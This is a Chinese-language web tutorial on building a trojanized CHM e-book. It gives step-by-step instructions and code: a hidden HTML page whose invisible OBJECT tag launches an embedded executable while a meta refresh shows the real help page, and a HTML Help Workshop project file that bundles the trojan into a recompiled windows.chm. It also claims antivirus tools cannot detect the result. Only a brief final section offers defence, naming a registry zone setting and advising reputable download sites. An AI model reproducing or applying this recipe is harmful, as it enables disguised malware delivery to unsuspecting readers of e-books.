熱點推薦:
您现在的位置: 電腦知識網 >> 網絡技術 >> 正文

CHM木馬制作攻略

2022-06-13   來源: 網絡技術 
  談起CHM格式的電子書,可能無人不曉。有很大一部分電子圖書都是使用CHM格式編譯的。由於木馬程序嵌入了電子書中,殺毒軟件無法對其中存在的病毒等破壞性程序進行檢查和清除。想知道這類電子書的制作方法嗎?今天筆者就以實例形式和大家一道分析一下。
  Step1:要想制作一個完美的CHM木馬,當然少不了電子書的制作工具。在這裡我們選擇微軟自家的Microsoft HTML Help Workshop,漢化版本可以在http://www.sixvee.com/520yy/tools/cytkk-2.rar下載。
  當然了,作為木馬程序的載體,一本CHM電子書是少不了的。本文演示所采用的是系統幫助文件中現成的windows.chm。
  Step2:首先運行windows.chm,在右側的空白處點擊右鍵菜單,進入“屬性”頁。記錄下該電子文檔的默認主頁default.htm和標題欄文字Windows 2000兩項信息。
  Step3:接下來需要制作一個可以讓木馬運行並且同時可以自動跳轉到windows.chm默認主頁的網頁,例如cytkk.htm,源代碼如下:
  <HTML>
  <HEAD>
  <meta http-equiv="refresh" content="3;url='default.htm'">
  </HEAD>
  <BODY>
  <OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobject" CODEBASE="灰色按鈕克星.exe">
  </OBJECT>
  </BODY>
  </HTML>
  代碼注釋:
  content="3是轉向時間(單位為秒),可以根據木馬程序的運行時間自行修改,建議不要超過5秒。TW.WINgWIT.CoM其中的default.htm可以改為你用的電子書的默認主頁名,灰色按鈕克星.exe為木馬程序名,你可以根據情況更改。
  Step4:運行HTML Help Workshop,選擇文件菜單下的反編譯項。接下來在反編譯後的目錄中可以看到windows.hhc(對應幫助文檔左側的“目錄”項)和windows.hhk(對應幫助文檔左側的“索引”項)。
  Step5:現在要做的就是把木馬程序復制到反編譯後的目錄中(本文中以插入灰色按鈕克星.exe這款小軟件為例),並在此目錄下建立一個例如文件名為cytkk.hhp的文件(用記事本即可),代碼如下:
  [OPTIONS]
  Compatibility=1.1 Or later
  Compiled file=windows.chm
  Default Window=Main
  Language=0x804 中文(中國)
  [WINDOWS]
  Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0
  [FILES]
  cytkk.htm
  灰色按鈕克星.exe
  代碼注釋:
  windows.chm可以改為你要生成的電子書名,而灰色按鈕克星.exe則把它改為要嵌入的木馬程序名,Main=後面改為在第一步時你得到的標題欄文字,windows.hhc及windows.hhk分別改為第三步得到的文件名。
  最後用HTML Help Workshop打開cytkk.hhp,點擊“文件”→“編譯”,待提示完成後,就可以在目標目錄中發現已經編譯好的帶有木馬的電子書windows.chm了。
高手傳經:防之有道
  我們不可能對下載的每本書都進行反編譯工作來加以檢查,那是會累死人的。筆者建議大家在下載電子書籍時,盡量去知名網站下載。
  另外讀者朋友們也可以修改本地安全屬性,使CHM木馬無法在本地運行木馬程序,將注冊表“HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Internet Settings\Zones\0”下的1004項的值由原來十進制的0改為十六進制的3。  
From:http://tw.wingwit.com/Article/Network/201309/1043.html
    推薦文章
    Copyright © 2005-2022 電腦知識網 Computer Knowledge   All rights reserved.